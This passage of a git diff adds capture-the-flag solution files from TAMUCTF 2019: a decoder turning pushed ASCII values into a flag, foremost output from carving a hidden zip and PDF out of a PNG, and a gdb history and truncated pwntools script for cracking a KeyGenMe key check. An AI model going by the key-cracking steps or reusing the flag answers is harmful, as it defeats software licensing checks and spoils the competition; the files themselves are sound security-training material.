b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png differ diff --git a/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png new file mode 100644 index 0000000..6b9d5d8 Binary files /dev/null and b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png differ diff --git a/TAMUCTF/Misc/Hello_World/decoder.py b/TAMUCTF/Misc/Hello_World/decoder.py new file mode 100644 index 0000000..93eba6a --- /dev/null +++ b/TAMUCTF/Misc/Hello_World/decoder.py @@ -0,0 +1,99 @@ +flag = '''push103 +push 105 +push 103 +push 101 +push 109 +push 123 +push 48 +push 104 +push 95 +push 109 +push 121 +push 95 +push 119 +push 104 +push 52 +push 116 +push 95 +push 115 +push 112 +push 52 +push 99 +push 49 +push 110 +push 103 +push 95 +push 121 +push 48 +push 117 +push 95 +push 104 +push 52 +push 118 +push 51 +push 125 +push 33 +push 101 +push 99 +push 97 +push 112 +push 115 +push 101 +push 116 +push 105 +push 104 +push 119 +push 32 +push 102 +push 111 +push 32 +push 116 +push 111 +push 108 +push 32 +push 97 +push 32 +push 115 +push 105 +push 32 +push 101 +push 114 +push 117 +push 115 +push 32 +push 116 +push 97 +push 104 +push 116 +push 32 +push 44 +push 101 +push 101 +push 103 +push 32 +push 121 +push 108 +push 108 +push 111 +push 103 +push 32 +push 116 +push 101 +push 101 +push 119 +push 115 +push 32 +push 108 +push 108 +push 101 +push 87 +''' +newflag = "" +flag = flag.replace('push', '') +flag = flag.replace('\n', '') +flag = flag.split(" ") +flag = map(int, flag) + +for i in flag: + newflag += chr(i) +print newflag diff --git a/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png new file mode 100644 index 0000000..8efdcec Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png new file mode 100644 index 0000000..2ea28c3 Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png new file mode 100644 index 0000000..0758ae1 Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png new file mode 100644 index 0000000..6dbbed0 Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png new file mode 100644 index 0000000..52b5619 Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/art.png b/TAMUCTF/Misc/I_heard_you_like_files/art.png new file mode 100644 index 0000000..f773dfc Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/art.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt b/TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt new file mode 100644 index 0000000..026c445 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt @@ -0,0 +1,27 @@ +Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus +Audit File + +Foremost started at Sun Mar 3 15:59:09 2019 +Invocation: foremost art.png +Output directory: /home/chao/Documents/CTF/TAMUCTF/Misc/I_heard_you_like_files/output +Configuration file: /etc/foremost.conf +------------------------------------------------------------------ +File: art.png +Start: Sun Mar 3 15:59:09 2019 +Length: 3 MB (3518869 bytes) + +Num Name (bs=512) Size File Offset Comment + +0: 00006700.zip 86 KB 3430685 +1: 00000000.png 3 MB 0 (1920 x 1080) +2: 00006657.pdf 21 KB 3408641 +Finish: Sun Mar 3 15:59:09 2019 + +3 FILES EXTRACTED + +zip:= 1 +png:= 1 +pdf:= 1 +------------------------------------------------------------------ + +Foremost finished at Sun Mar 3 15:59:09 2019 diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf b/TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf new file mode 100644 index 0000000..8f94b62 Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png b/TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png new file mode 100644 index 0000000..1f4a29c Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip new file mode 100644 index 0000000..0b9376f Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml new file mode 100644 index 0000000..2bab4c5 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels new file mode 100644 index 0000000..f0b72e7 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml new file mode 100644 index 0000000..93e3453 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml @@ -0,0 +1,2 @@ + +12LibreOffice/6.1.1.2$Linux_X86_64 LibreOffice_project/10$Build-21424271 \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml new file mode 100644 index 0000000..137cfe9 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml @@ -0,0 +1,2 @@ + +2018-09-20T15:47:36Zen-US2018-09-20T16:00:01Z1 \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt new file mode 100644 index 0000000..56f3185 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt @@ -0,0 +1 @@ +Sorry, no flag here diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels new file mode 100644 index 0000000..145e25c --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml new file mode 100644 index 0000000..cc0596d --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml @@ -0,0 +1,2 @@ + +center635Wait...now I am confused... \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml new file mode 100644 index 0000000..b84d9e1 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png new file mode 100644 index 0000000..6ed51bb Binary files /dev/null and b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png differ diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml new file mode 100644 index 0000000..82ee0f8 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml new file mode 100644 index 0000000..4e4b269 --- /dev/null +++ b/TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/TAMUCTF/Reverse/KeyGenMe/.gdb_history b/TAMUCTF/Reverse/KeyGenMe/.gdb_history new file mode 100644 index 0000000..5e0116f --- /dev/null +++ b/TAMUCTF/Reverse/KeyGenMe/.gdb_history @@ -0,0 +1,10 @@ +pdisas main +b *main+200 +r +pdisas verify_key +b *verify_key+96 +r +pdisas verify_key +b *verify_key+96 +r +r diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png new file mode 100644 index 0000000..89ab824 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png new file mode 100644 index 0000000..d42defe Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png new file mode 100644 index 0000000..76cb8b2 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png new file mode 100644 index 0000000..f7cc263 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png new file mode 100644 index 0000000..9f238de Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png new file mode 100644 index 0000000..6016616 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png new file mode 100644 index 0000000..2fab23d Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png new file mode 100644 index 0000000..c758445 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png new file mode 100644 index 0000000..24144b6 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png new file mode 100644 index 0000000..17ad543 Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png new file mode 100644 index 0000000..dee852c Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png new file mode 100644 index 0000000..fec0a5b Binary files /dev/null and b/TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png differ diff --git a/TAMUCTF/Reverse/KeyGenMe/bruteforce.py b/TAMUCTF/Reverse/KeyGenMe/bruteforce.py new file mode 100644 index 0000000..1a641e9 --- /dev/null +++ b/TAMUCTF/Reverse/KeyGenMe/bruteforce.py @@ -0,0 +1,20 @@ +from pwn import * +v5 = "" +v2 = ord('H') +flag = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" +key = "[OIonU2_<__nK